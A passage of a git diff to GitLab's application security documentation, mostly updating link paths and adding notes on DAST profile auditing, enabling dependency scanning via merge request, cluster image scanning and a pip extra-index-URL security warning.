`"css:.username"` for the `username` class on the username field. +- `class` values specific to the field, such as the selector `"css:.username"` for the `username` class on the username field. - Presence of field specific data attributes, such as the selector, `"css:[data-username]"` when the `data-username` field has any value on the username field. -- Multiple `class` hierarchy values, such as the selector `"css:.login-form .username"` when there are multiple elements with class `username` but only one nested inside the element with the class `login-form`. +- Multiple `class` hierarchy values, such as the selector `"css:.login-form .username"` when there are multiple elements with class `username` but only one nested inside the element with the class `login-form`. When using selectors to locate specific fields we recommend you avoid searching on: @@ -880,6 +941,8 @@ Debug mode of the ZAP server can be enabled using the `DAST_ZAP_LOG_CONFIGURATIO The following table outlines examples of values that can be set and the effect that they have on the output that is logged. Multiple values can be specified, separated by semicolons. +For example, `log4j.logger.org.parosproxy.paros.network.HttpSender=DEBUG;log4j.logger.com.crawljax=DEBUG`. + | Log configuration value | Effect | |-------------------------------------------------- | ----------------------------------------------------------------- | | `log4j.rootLogger=DEBUG` | Enable all debug logging statements. | @@ -901,8 +964,8 @@ To use DAST in an offline environment, you need: - GitLab Runner with the [`docker` or `kubernetes` executor](#prerequisites). - Docker Container Registry with a locally available copy of the DAST - [container image](https://gitlab.com/gitlab-org/security-products/dast), found in the - [DAST container registry](https://gitlab.com/gitlab-org/security-products/dast/container_registry). + [container image](https://gitlab.com/security-products/dast), found in the + [DAST container registry](https://gitlab.com/security-products/dast/container_registry). Note that GitLab Runner has a [default `pull policy` of `always`](https://docs.gitlab.com/runner/executors/docker.html#using-the-always-pull-policy), meaning the runner tries to pull Docker images from the GitLab container registry even if a local @@ -915,7 +978,7 @@ enables the use of updated scanners in your CI/CD pipelines. For DAST, import the following default DAST analyzer image from `registry.gitlab.com` to your [local Docker container registry](../../packages/container_registry/index.md): -- `registry.gitlab.com/gitlab-org/security-products/dast:latest` +- `registry.gitlab.com/security-products/dast:latest` The process for importing Docker images into a local offline Docker registry depends on **your network security policy**. Please consult your IT staff to find an accepted and approved @@ -953,6 +1016,7 @@ Alternatively, you can use the CI/CD variable `SECURE_ANALYZERS_PREFIX` to overr > - The saved scans feature was [introduced](https://gitlab.com/groups/gitlab-org/-/epics/5100) in GitLab 13.9. > - The option to select a branch was [introduced](https://gitlab.com/groups/gitlab-org/-/epics/4847) in GitLab 13.10. > - DAST branch selection [feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/322672) in GitLab 13.11. +> - Auditing for DAST profile management was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/217872) in GitLab 14.1. An on-demand DAST scan runs outside the DevOps life cycle. Changes in your repository don't trigger the scan. You must start it manually. @@ -1276,6 +1340,13 @@ If a scanner profile is linked to a security policy, a user cannot delete the pr page. See [Scan Policies](../policies/index.md) for more information. +### Auditing + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/217872) in GitLab 14.1. + +The creation, updating, and deletion of DAST profiles, DAST scanner profiles, +and DAST site profiles are included in the [audit log](../../../administration/audit_events.md). + ## Reports The DAST tool outputs a report file in JSON format by default. However, this tool can also generate reports in diff --git a/doc/user/application_security/dast_api/index.md b/doc/user/application_security/dast_api/index.md index 9a6e1e73330..48a784e0d03 100644 --- a/doc/user/application_security/dast_api/index.md +++ b/doc/user/application_security/dast_api/index.md @@ -7,11 +7,11 @@ type: reference, howto # DAST API **(ULTIMATE)** -You can add dynamic application security testing of web APIs to your [GitLab CI/CD](../../../ci/README.md) pipelines. +You can add dynamic application security testing of web APIs to your [GitLab CI/CD](../../../ci/index.md) pipelines. This helps you discover bugs and potential security issues that other QA processes may miss. We recommend that you use DAST API testing in addition to [GitLab Secure](../index.md)'s -other security scanners and your own test processes. If you're using [GitLab CI/CD](../../../ci/README.md), +other security scanners and your own test processes. If you're using [GitLab CI/CD](../../../ci/index.md), you can run DAST API tests as part your CI/CD workflow. ## Requirements @@ -85,7 +85,7 @@ the body generation is limited to these body types: Follow these steps to configure DAST API in GitLab with an OpenAPI specification: -1. To use DAST API, you must [include](../../../ci/yaml/README.md#includetemplate) +1. To use DAST API, you must [include](../../../ci/yaml/index.md#includetemplate) the [`DAST-API.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/DAST-API.gitlab-ci.yml) that's provided as part of your GitLab installation. Add the following to your `.gitlab-ci.yml` file: @@ -184,7 +184,7 @@ cookies. We recommend that you review the HAR file contents before adding them t Follow these steps to configure DAST API to use a HAR file that provides information about the target API to test: -1. To use DAST API, you must [include](../../../ci/yaml/README.md#includetemplate) +1. To use DAST API, you must [include](../../../ci/yaml/index.md#includetemplate) the [`DAST-API.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/DAST-API.gitlab-ci.yml) that's provided as part of your GitLab installation. To do so, add the following to your `.gitlab-ci.yml` file: @@ -284,7 +284,7 @@ them to a repository. Follow these steps to configure DAST API to use a Postman Collection file that provides information about the target API to test: -1. To use DAST API, you must [include](../../../ci/yaml/README.md#includetemplate) +1. To use DAST API, you must [include](../../../ci/yaml/index.md#includetemplate) the [`DAST-API.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/DAST-API.gitlab-ci.yml) that's provided as part of your GitLab installation. To do so, add the following to your `.gitlab-ci.yml` file: @@ -435,7 +435,7 @@ To use HTTP basic authentication, two CI/CD variables are added to your `.gitlab - `DAST_API_HTTP_USERNAME`: The username for authentication. - `DAST_API_HTTP_PASSWORD`: The password for authentication. -For the password, we recommended that you [create a CI/CD variable](../../../ci/variables/README.md#custom-cicd-variables) +For the password, we recommended that you [create a CI/CD variable](../../../ci/variables/index.md#custom-cicd-variables) (for example, `TEST_API_PASSWORD`) set to the password. You can create CI/CD variables from the GitLab projects page at **Settings > CI/CD**, in the **Variables** section. Use that variable as the value for `DAST_API_HTTP_PASSWORD`: @@ -473,7 +473,7 @@ outgoing HTTP requests. Follow these steps to provide the bearer token with `DAST_API_OVERRIDES_ENV`: -1. [Create a CI/CD variable](../../../ci/variables/README.md#custom-cicd-variables), +1. [Create a CI/CD variable](../../../ci/variables/index.md#custom-cicd-variables), for example `TEST_API_BEARERAUTH`, with the value `{"headers":{"Authorization":"Bearer dXNlcm5hbWU6cGFzc3dvcmQ="}}` (substitute your token). You can create CI/CD variables from the GitLab projects page at **Settings > CI/CD**, in the @@ -849,7 +849,7 @@ variables: ``` In this example `.gitlab-ci.yml`, the `SECRET_OVERRIDES` variable provides the JSON. This is a -[group or instance level CI/CD variable defined in the UI](../../../ci/variables/README.md#add-a-cicd-variable-to-an-instance): +[group or instance level CI/CD variable defined in the UI](../../../ci/variables/index.md#add-a-cicd-variable-to-an-instance): ```yaml stages: diff --git a/doc/user/application_security/dependency_list/index.md b/doc/user/application_security/dependency_list/index.md index fcefba943ad..9fc90c427c5 100644 --- a/doc/user/application_security/dependency_list/index.md +++ b/doc/user/application_security/dependency_list/index.md @@ -13,7 +13,7 @@ Use the dependency list to review your project's dependencies and key details about those dependencies, including their known vulnerabilities. It is a collection of dependencies in your project, including existing and new findings. To see the dependency list, go to your project and select **Security & Compliance > Dependency List**. This information is sometimes referred to as a Software Bill of Materials or SBoM / BOM. -The dependency list only shows the results of the last successful pipeline to run on the default branch. This is why we recommend not changing the default behavior of allowing the secure jobs to fail. +The dependency list only shows the results of the last successful pipeline to run on the default branch. This is why we recommend not changing the default behavior of allowing the secure jobs to fail. ## Prerequisites diff --git a/doc/user/application_security/dependency_scanning/index.md b/doc/user/application_security/dependency_scanning/index.md index 96fc085e7c6..76a14aae715 100644 --- a/doc/user/application_security/dependency_scanning/index.md +++ b/doc/user/application_security/dependency_scanning/index.md @@ -16,7 +16,7 @@ vulnerable. You can then take action to protect your application. ## Overview -If you're using [GitLab CI/CD](../../../ci/README.md), you can use dependency scanning to analyze +If you're using [GitLab CI/CD](../../../ci/index.md), you can use dependency scanning to analyze your dependencies for known vulnerabilities. GitLab scans all dependencies, including transitive dependencies (also known as nested dependencies). You can take advantage of dependency scanning by either: @@ -55,7 +55,7 @@ is **not** `19.03.0`. See [troubleshooting information](#error-response-from-dae ## Supported languages and package managers -GitLab relies on [`rules`](../../../ci/yaml/README.md#rules) to start relevant analyzers depending on the languages detected in the repository. +GitLab relies on [`rules`](../../../ci/yaml/index.md#rules) to start relevant analyzers depending on the languages detected in the repository. The current detection logic limits the maximum search depth to two levels. For example, the `gemnasium-dependency_scanning` job is enabled if a repository contains either a `Gemfile` or `api/Gemfile` file, but not if the only supported dependency file is `api/client/Gemfile`. The following languages and dependency managers are supported: @@ -90,7 +90,7 @@ The [Security Scanner Integration](../../../development/integrations/secure.md) ## Configuration To enable dependency scanning for GitLab 11.9 and later, you must -[include](../../../ci/yaml/README.md#includetemplate) the +[include](../../../ci/yaml/index.md#includetemplate) the [`Dependency-Scanning.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/Dependency-Scanning.gitlab-ci.yml) that is provided as a part of your GitLab installation. For GitLab versions earlier than 11.9, you can copy and use the job as defined @@ -106,14 +106,39 @@ include: The included template creates dependency scanning jobs in your CI/CD pipeline and scans your project's source code for possible vulnerabilities. The results are saved as a -[dependency scanning report artifact](../../../ci/yaml/README.md#artifactsreportsdependency_scanning) +[dependency scanning report artifact](../../../ci/yaml/index.md#artifactsreportsdependency_scanning) that you can later download and analyze. Due to implementation limitations, we always take the latest dependency scanning artifact available. +### Enable Dependency Scanning via an automatic merge request + +> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/4908) in GitLab 14.1. +> - [Deployed behind a feature flag](../../../user/feature_flags.md), enabled by default. +> - Enabled on GitLab.com. +> - Recommended for production use. +> - For GitLab self-managed instances, GitLab administrators can opt to [disable it](#enable-or-disable-configure-dependency-scanning-via-a-merge-request). **(ULTIMATE SELF)** + +WARNING: +This feature might not be available to you. Check the **version history** note above for details. + +There can be +[risks when disabling released features](../../../user/feature_flags.md#risks-when-disabling-released-features). +Refer to this feature's version history for more details. + +To enable Dependency Scanning in a project, you can create a merge request +from the Security Configuration page. + +1. In the project where you want to enable Dependency Scanning, navigate to + **Security & Compliance > Configuration**. +1. In the **Dependency Scanning** row, select **Configure via Merge Request**. + +This automatically creates a merge request with the changes necessary to enable Dependency Scanning +that you can review and merge to complete the configuration. + ### Customizing the dependency scanning settings The dependency scanning settings can be changed through [CI/CD variables](#available-cicd-variables) by using the -[`variables`](../../../ci/yaml/README.md#variables) parameter in `.gitlab-ci.yml`. +[`variables`](../../../ci/yaml/index.md#variables) parameter in `.gitlab-ci.yml`. For example: ```yaml @@ -124,14 +149,14 @@ variables: SECURE_LOG_LEVEL: error ``` -Because template is [evaluated before](../../../ci/yaml/README.md#include) the pipeline +Because template is [evaluated before](../../../ci/yaml/index.md#include) the pipeline configuration, the last mention of the variable takes precedence. ### Overriding dependency scanning jobs WARNING: -Beginning in GitLab 13.0, the use of [`only` and `except`](../../../ci/yaml/README.md#only--except) -is no longer supported. When overriding the template, you must use [`rules`](../../../ci/yaml/README.md#rules) instead. +Beginning in GitLab 13.0, the use of [`only` and `except`](../../../ci/yaml/index.md#only--except) +is no longer supported. When overriding the template, you must use [`rules`](../../../ci/yaml/index.md#rules) instead. To override a job definition (for example, to change properties like `variables` or `dependencies`), declare a new job with the same name as the one to override. Place this new job after the template @@ -189,12 +214,12 @@ The following variables are used for configuring specific analyzers (used for a | `GEMNASIUM_DB_REMOTE_URL` | `gemnasium` | `https://gitlab.com/gitlab-org/security-products/gemnasium-db.git` | Repository URL for fetching the Gemnasium database. | | `GEMNASIUM_DB_REF_NAME` | `gemnasium` | `master` | Branch name for remote repository database. `GEMNASIUM_DB_REMOTE_URL` is required. | | `DS_REMEDIATE` | `gemnasium` | `"true"` | Enable automatic remediation of vulnerable dependencies. | -| `DS_JAVA_VERSION` | `gemnasium-maven` | `11` | Version of Java. Available versions: `8`, `11`, `13`, `14`, `15`, `16`. Maven and Gradle use the Java version specified by this value (Dependency Scanning for Gradle does not currently support Java `16`). | +| `DS_JAVA_VERSION` | `gemnasium-maven` | `11` | Version of Java. Available versions: `8`, `11`, `13`, `14`, `15`, `16`. | | `MAVEN_CLI_OPTS` | `gemnasium-maven` | `"-DskipTests --batch-mode"` | List of command line arguments that are passed to `maven` by the analyzer. See an example for [using private repositories](../index.md#using-private-maven-repositories). | | `GRADLE_CLI_OPTS` | `gemnasium-maven` | | List of command line arguments that are passed to `gradle` by the analyzer. | | `SBT_CLI_OPTS` | `gemnasium-maven` | | List of command-line arguments that the analyzer passes to `sbt`. | | `PIP_INDEX_URL` | `gemnasium-python` | `https://pypi.org/simple` | Base URL of Python Package Index. | -| `PIP_EXTRA_INDEX_URL` | `gemnasium-python` | | Array of [extra URLs](https://pip.pypa.io/en/stable/reference/pip_install/#cmdoption-extra-index-url) of package indexes to use in addition to `PIP_INDEX_URL`. Comma-separated. | +| `PIP_EXTRA_INDEX_URL` | `gemnasium-python` | | Array of [extra URLs](https://pip.pypa.io/en/stable/reference/pip_install/#cmdoption-extra-index-url) of package indexes to use in addition to `PIP_INDEX_URL`. Comma-separated. **Warning:** Please read [the following security consideration](#python-projects) when using this environment variable. | | `PIP_REQUIREMENTS_FILE` | `gemnasium-python` | | Pip requirements file to be scanned. | | `DS_PIP_VERSION` | `gemnasium-python` | | Force the install of a specific pip version (example: `"19.3"`), otherwise the pip installed in the Docker image is used. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12811) in GitLab 12.7) | | `DS_PIP_DEPENDENCY_PATH` | `gemnasium-python` | | Path to load Python pip dependencies from. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12412) in GitLab 12.2) | @@ -217,7 +242,7 @@ variables: -----END CERTIFICATE----- ``` -The `ADDITIONAL_CA_CERT_BUNDLE` value can also be configured as a [custom variable in the UI](../../../ci/variables/README.md#custom-cicd-variables), either as a `file`, which requires the path to the certificate, or as a variable, which requires the text representation of the certificate. +The `ADDITIONAL_CA_CERT_BUNDLE` value can also be configured as a [custom variable in the UI](../../../ci/variables/index.md#custom-cicd-variables), either as a `file`, which requires the path to the certificate, or as a variable, which requires the text representation of the certificate. ### Using private Maven repositories @@ -552,6 +577,18 @@ gemnasium-dependency_scanning: - tar -xzf gemnasium_db.tar.gz -C $GEMNASIUM_DB_LOCAL_PATH ``` +## Warnings + +### Python projects + +Extra care needs to be taken when using the [`PIP_EXTRA_INDEX_URL`](https://pipenv.pypa.io/en/latest/cli/#envvar-PIP_EXTRA_INDEX_URL) +environment variable due to a possible exploit documented by [CVE-2018-20225](https://nvd.nist.gov/vuln/detail/CVE-2018-20225): + +> An issue was discovered in pip (all versions) because it installs the version with the highest version number, even if the user had +intended to obtain a private package from a private index. This only affects use of the `PIP_EXTRA_INDEX_URL` option, and exploitation +requires that the package does not already exist in the public index (and thus the attacker can put the package there with an arbitrary +version number). + ## Limitations ### Referencing local dependencies using a path in JavaScript projects @@ -584,7 +621,7 @@ Generally, the approach is the following: 1. Define a dedicated converter job in your `.gitlab-ci.yml` file. Use a suitable Docker image, script, or both to facilitate the conversion. 1. Let that job upload the converted, supported file as an artifact. -1. Add [`dependencies: [<your-converter-job>]`](../../../ci/yaml/README.md#dependencies) +1. Add [`dependencies: [<your-converter-job>]`](../../../ci/yaml/index.md#dependencies) to your `dependency_scanning` job to make use of the converted definitions files. For example, the currently unsupported `poetry.lock` file can be @@ -631,7 +668,7 @@ For information on this, see the [general Application Security troubleshooting s ### Limitation when using rules:exists The [dependency scanning CI template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/Dependency-Scanning.gitlab-ci.yml) -uses the [`rules:exists`](../../../ci/yaml/README.md#rulesexists) +uses the [`rules:exists`](../../../ci/yaml/index.md#rulesexists) syntax. This directive is limited to 10000 checks and always returns `true` after reaching this number. Because of this, and depending on the number of files in your repository, a dependency scanning job might be triggered even if the scanner doesn't support your project. @@ -644,3 +681,22 @@ with a dependency on this version of Python should use `retire.js` version 2.10. ### Error: `dependency_scanning is used for configuration only, and its script should not be executed` For information on this, see the [GitLab Secure troubleshooting section](../index.md#error-job-is-used-for-configuration-only-and-its-script-should-not-be-executed). + +### Enable or disable Configure Dependency Scanning via a Merge Request + +Configure Dependency Scanning via a Merge Request is under development but ready for production use. +It is deployed behind a feature flag that is **enabled by default**. +[GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) +can opt to disable it. + +To disable it: + +```ruby +Feature.disable(:sec_dependency_scanning_ui_enable) +``` + +To enable it: + +```ruby +Feature.enable(:sec_dependency_scanning_ui_enable) +``` diff --git a/doc/user/application_security/index.md b/doc/user/application_security/index.md index bf812b25b5f..616d2f8c790 100644 --- a/doc/user/application_security/index.md +++ b/doc/user/application_security/index.md @@ -33,16 +33,17 @@ GitLab uses the following tools to scan and report known vulnerabilities found i | Secure scanning tool | Description | |:-----------------------------------------------------------------------------|:-----------------------------------------------------------------------| -| [Container Scanning](container_scanning/index.md) **(ULTIMATE)** | Scan Docker containers for known vulnerabilities. | -| [Dependency List](dependency_list/index.md) **(ULTIMATE)** | View your project's dependencies and their known vulnerabilities. | -| [Dependency Scanning](dependency_scanning/index.md) **(ULTIMATE)** | Analyze your dependencies for known vulnerabilities. | -| [Dynamic Application Security Testing (DAST)](dast/index.md) **(ULTIMATE)** | Analyze running web applications for known vulnerabilities. | -| [DAST API](dast_api/index.md) **(ULTIMATE)** | Analyze running web APIs for known vulnerabilities. | -| [API fuzzing](api_fuzzing/index.md) **(ULTIMATE)** | Find unknown bugs and vulnerabilities in web APIs with fuzzing. | -| [Secret Detection](secret_detection/index.md) | Analyze Git history for leaked secrets. | -| [Security Dashboard](security_dashboard/index.md) **(ULTIMATE)** | View vulnerabilities in all your projects and groups. | -| [Static Application Security Testing (SAST)](sast/index.md) | Analyze source code for known vulnerabilities. | -| [Coverage fuzzing](coverage_fuzzing/index.md) **(ULTIMATE)** | Find unknown bugs and vulnerabilities with coverage-guided fuzzing. | +| [Container Scanning](container_scanning/index.md) **(ULTIMATE)** | Scan Docker containers for known vulnerabilities. | +| [Dependency List](dependency_list/index.md) **(ULTIMATE)** | View your project's dependencies and their known vulnerabilities. | +| [Dependency Scanning](dependency_scanning/index.md) **(ULTIMATE)** | Analyze your dependencies for known vulnerabilities. | +| [Dynamic Application Security Testing (DAST)](dast/index.md) **(ULTIMATE)** | Analyze running web applications for known vulnerabilities. | +| [DAST API](dast_api/index.md) **(ULTIMATE)** | Analyze running web APIs for known vulnerabilities. | +| [API fuzzing](api_fuzzing/index.md) **(ULTIMATE)** | Find unknown bugs and vulnerabilities in web APIs with fuzzing. | +| [Secret Detection](secret_detection/index.md) | Analyze Git history for leaked secrets. | +| [Security Dashboard](security_dashboard/index.md) **(ULTIMATE)** | View vulnerabilities in all your projects and groups. | +| [Static Application Security Testing (SAST)](sast/index.md) | Analyze source code for known vulnerabilities. | +| [Coverage fuzzing](coverage_fuzzing/index.md) **(ULTIMATE)** | Find unknown bugs and vulnerabilities with coverage-guided fuzzing. | +| [Cluster Image Scanning](cluster_image_scanning/index.md) **(ULTIMATE)** | Scan Kubernetes clusters for known vulnerabilities. | ## Security scanning with Auto DevOps @@ -99,7 +100,7 @@ the container-scanning analyzer which uses ### Use security scanning tools with Pipelines for Merge Requests By default, the application security jobs are configured to run for branch pipelines only. -To use them with [pipelines for merge requests](../../ci/merge_request_pipelines/index.md), +To use them with [pipelines for merge requests](../../ci/pipelines/merge_request_pipelines.md), you may need to override the default `rules:` configuration to add: ```yaml @@ -129,7 +130,7 @@ All jobs are permitted to fail by default. This means that if they fail it do no If you want to prevent vulnerabilities from being merged, you should do this by adding [Security Approvals in Merge Requests](#security-approvals-in-merge-requests) which prevents unknown, high or critical findings from being merged without an approval from a specific group of people that you choose. -We do not recommend changing the job [`allow_failure` setting](../../ci/yaml/README.md#allow_failure) as that fails the entire pipeline. +We do not recommend changing the job [`allow_failure` setting](../../ci/yaml/index.md#allow_failure) as that fails the entire pipeline. ### JSON Artifact @@ -209,7 +210,6 @@ request contains a denied license. For more details, see [Enabling license appro Prerequisites: -- At least one [security scanner job](#security-scanning-tools) must be enabled. - Maintainer or Owner [role](../permissions.md#project-members-permissions). For this approval group, you must set the number of approvals required to greater than zero. @@ -238,7 +238,7 @@ to pass a username and password. You can set it under your project's settings so that your credentials aren't exposed in `.gitlab-ci.yml`. If the username is `myuser` and the password is `verysecret` then you would -[set the following variable](../../ci/variables/README.md#custom-cicd-variables) +[set the following variable](../../ci/variables/index.md#custom-cicd-variables) under your project's settings: | Type | Key | Value | @@ -358,7 +358,7 @@ You can do it quickly by following the hyperlink given to run a new pipeline. ### Getting error message `sast job: stage parameter should be [some stage name here]` -When [including](../../ci/yaml/README.md#includetemplate) a `.gitlab-ci.yml` template +When [including](../../ci/yaml/index.md#includetemplate) a `.gitlab-ci.yml` template like [`SAST.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/SAST.gitlab-ci.yml), the following error may occur, depending on your GitLab CI/CD configuration: @@ -406,12 +406,12 @@ This is often followed by the [error `No files to upload`](../../ci/pipelines/jo and preceded by other errors or warnings that indicate why the JSON report wasn't generated. Please check the entire job log for such messages. If you don't find these messages, retry the failed job after setting `SECURE_LOG_LEVEL: "debug"` as a -[custom CI/CD variable](../../ci/variables/README.md#custom-cicd-variables). +[custom CI/CD variable](../../ci/variables/index.md#custom-cicd-variables). This provides useful information to investigate further. ### Getting error message `sast job: config key may not be used with 'rules': only/except` -When [including](../../ci/yaml/README.md#includetemplate) a `.gitlab-ci.yml` template +When [including](../../ci/yaml/index.md#includetemplate) a `.gitlab-ci.yml` template like [`SAST.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/SAST.gitlab-ci.yml), the following error may occur, depending on your GitLab CI/CD configuration: @@ -422,7 +422,7 @@ Found errors in your .gitlab-ci.yml: ``` This error appears when the included job's `rules` configuration has been [overridden](sast/index.md#overriding-sast-jobs) -with [the deprecated `only` or `except` syntax.](../../ci/yaml/README.md#only--except) +with [the deprecated `only` or `except` syntax.](../../ci/yaml/index.md#only--except) To fix this issue, you must either: - [Transition your `only/except` syntax to `rules`](#transitioning-your-onlyexcept-syntax-to-rules). @@ -433,8 +433,8 @@ To fix this issue, you must either: #### Transitioning your `only/except` syntax to `rules` When overriding the template to control job execution, previous instances of -[`only` or `except`](../../ci/yaml/README.md#only--except) are no longer compatible -and must be transitioned to [the `rules` syntax](../../ci/yaml/README.md#rules). +[`only` or `except`](../../ci/yaml/index.md#only--except) are no longer compatible +and must be transitioned to [the `rules` syntax](../../ci/yaml/index.md#rules). If your override is aimed at limiting jobs to only run on `master`, the previous syntax would look similar to: @@ -490,11 +490,11 @@ spotbugs-sast: - if: $CI_COMMIT_TAG == null ``` -[Learn more on the usage of `rules`](../../ci/yaml/README.md#rules). +[Learn more on the usage of `rules`](../../ci/yaml/index.md#rules). #### Pin your templates to the deprecated versions -To ensure the latest support, we **strongly** recommend that you migrate to [`rules`](../../ci/yaml/README.md#rules). +To ensure the latest support, we **strongly** recommend that you migrate to [`rules`](../../ci/yaml/index.md#rules). If you're unable to immediately update your CI configuration, there are several workarounds that involve pinning to the previous template versions, for example: diff --git a/doc/user/application_security/offline_deployments/index.md b/doc/user/application_security/offline_deployments/index.md index 77a15a37c55..d87da15b4b0 100644 --- a/doc/user/application_security/offline_deployments/index.md +++ b/doc/user/application_security/offline_deployments/index.md @@ -108,7 +108,7 @@ example of such a transfer: ### Using the official GitLab template -GitLab provides a [vendored template](../../../ci/yaml/README.md#includetemplate) +GitLab provides a [vendored template](../../../ci/yaml/index.md#includetemplate) to ease this process. This template should be used in a new, empty project, with a `gitlab-ci.yml` file containing: @@ -149,7 +149,7 @@ GitLab.com. To do so, set the CI/CD variable `SECURE_ANALYZERS_PREFIX` with the project [container registry](../../packages/container_registry/index.md). You can set this variable in the projects' `.gitlab-ci.yml`, or -in the GitLab UI at the project or group level. See the [GitLab CI/CD variables page](../../../ci/variables/README.md#custom-cicd-variables) +in the GitLab UI at the project or group level. See the [GitLab CI/CD variables page](../../../ci/variables/index.md#custom-cicd-variables) for more information. #### Variables diff --git a/doc/user/application_security/policies/index.md b/doc/user/application_security/policies/index.md index 92f0d6924b3..076872c9864 100644 --- a/doc/user/application_security/policies/index.md +++ b/doc/user/application_security/policies/index.md @@ -191,6 +191,10 @@ changes. You can always change the **Security policy project** by navigating to your project's **Security & Compliance > Policies** and modifying the selected project. +NOTE: +Only project Owners have the [permissions](../../permissions.md#project-members-permissions) +to select Security Policy Project. + ## Roadmap See the [Category Direction page](https://about.gitlab.com/direction/protect/container_network_security/) diff --git a/doc/user/application_security/sast/img/sast_results_in_mr_v14_0.png b/doc/user/application_security/sast/img/sast_results_in_mr_v14_0.png Binary files differnew file mode 100644 index 00000000000..17edc30fa0f --- /dev/null +++ b/doc/user/application_security/sast/img/sast_results_in_mr_v14_0.png diff --git a/doc/user/application_security/sast/index.md b/doc/user/application_security/sast/index.md index e80807b31bf..c64df616925 100644 --- a/doc/user/application_security/sast/index.md +++ b/doc/user/application_security/sast/index.md @@ -15,13 +15,15 @@ The whitepaper ["A Seismic Shift in Application Security"](https://about.gitlab. explains how 4 of the top 6 attacks were application based. Download it to learn how to protect your organization. -If you're using [GitLab CI/CD](../../../ci/README.md), you can analyze your source code for known -vulnerabilities using Static Application Security Testing (SAST). GitLab checks the SAST report and -compares the found vulnerabilities between the source and target branches. +If you're using [GitLab CI/CD](../../../ci/index.md), you can use Static Application Security +Testing (SAST) to check your source code for known vulnerabilities. When a pipeline completes, +the results of the SAST analysis are processed and shown in the pipeline's Security tab. If the +pipeline is associated with a merge request, the SAST analysis is compared with the results of +the target branch's analysis (if available). The results of that comparison are shown in the merge +request. **(ULTIMATE)** If the pipeline is running from the default branch, the results of the SAST +analysis are available in the [security dashboards](../security_dashboard/index.md). -Details of the vulnerabilities found are included in the merge request. **(ULTIMATE)** - - + The results are sorted by the priority of the vulnerability: @@ -160,7 +162,7 @@ To configure SAST for a project you can: ### Configure SAST manually -For GitLab 11.9 and later, to enable SAST you must [include](../../../ci/yaml/README.md#includetemplate) +For GitLab 11.9 and later, to enable SAST you must [include](../../../ci/yaml/index.md#includetemplate) the [`SAST.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/SAST.gitlab-ci.yml) provided as a part of your GitLab installation. For GitLab versions earlier than 11.9, you can copy and use the job as defined that template. @@ -176,7 +178,7 @@ The included template creates SAST jobs in your CI/CD pipeline and scans your project's source code for possible vulnerabilities. The results are saved as a -[SAST report artifact](../../../ci/yaml/README.md#artifactsreportssast) +[SAST report artifact](../../../ci/yaml/index.md#artifactsreportssast) that you can later download and analyze. Due to implementation limitations, we always take the latest SAST artifact available. @@ -204,7 +206,7 @@ page: The SAST settings can be changed through [CI/CD variables](#available-cicd-variables) by using the -[`variables`](../../../ci/yaml/README.md#variables) parameter in `.gitlab-ci.yml`. +[`variables`](../../../ci/yaml/index.md#variables) parameter in `.gitlab-ci.yml`. In the following example, we include the SAST template and at the same time we set the `SAST_GOSEC_LEVEL` variable to `2`: @@ -216,14 +218,14 @@ variables: SAST_GOSEC_LEVEL: 2 ``` -Because the template is [evaluated before](../../../ci/yaml/README.md#include) +Because the template is [evaluated before](../../../ci/yaml/index.md#include) the pipeline configuration, the last mention of the variable takes precedence. ### Overriding SAST jobs WARNING: -Beginning in GitLab 13.0, the use of [`only` and `except`](../../../ci/yaml/README.md#only--except) -is no longer supported. When overriding the template, you must use [`rules`](../../../ci/yaml/README.md#rules) instead. +Beginning in GitLab 13.0, the use of [`only` and `except`](../../../ci/yaml/index.md#only--except) +is no longer supported. When overriding the template, you must use [`rules`](../../../ci/yaml/index.md#rules) instead. To override a job definition, (for example, change properties like `variables` or `dependencies`), declare a job with the same name as the SAST job to override. Place this new job after the template @@ -463,7 +465,7 @@ variables: -----END CERTIFICATE----- ``` -The `ADDITIONAL_CA_CERT_BUNDLE` value can also be configured as a [custom variable in the UI](../../../ci/variables/README.md#custom-cicd-variables), either as a `file`, which requires the path to the certificate, or as a variable, which requires the text representation of the certificate. +The `ADDITIONAL_CA_CERT_BUNDLE` value can also be configured as a [custom variable in the UI](../../../ci/variables/index.md#custom-cicd-variables), either as a `file`, which requires the path to the certificate, or as a variable, which requires the text representation of the certificate. #### Docker images @@ -497,7 +499,7 @@ Some analyzers can be customized with CI/CD variables. | `SCAN_KUBERNETES_MANIFESTS` | Kubesec | Set to `"true"` to scan Kubernetes manifests. | | `KUBESEC_HELM_CHARTS_PATH` | Kubesec | Optional path to Helm charts that `helm` uses to generate a Kubernetes manifest that `kubesec` scans. If dependencies are defined, `helm dependency build` should be ran in a `before_script` to fetch the necessary dependencies. | | `KUBESEC_HELM_OPTIONS` | Kubesec | Additional arguments for the `helm` executable. | -| `COMPILE` | SpotBugs | Set to `false` to disable project compilation and dependency fetching. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/195252) in GitLab 13.1. | +| `COMPILE` | Gosec, SpotBugs | Set to `false` to disable project compilation and dependency fetching. [Introduced for `SpotBugs`](https://gitlab.com/gitlab-org/gitlab/-/issues/195252) analyzer in GitLab 13.1 and [`Gosec`](https://gitlab.com/gitlab-org/gitlab/-/issues/330678) analyzer in GitLab 14.0. | | `ANT_HOME` | SpotBugs | The `ANT_HOME` variable. | | `ANT_PATH` | SpotBugs | Path to the `ant` executable. | | `GRADLE_PATH` | SpotBugs | Path to the `gradle` executable. | @@ -510,8 +512,8 @@ Some analyzers can be customized with CI/CD variables. | `SBT_PATH` | 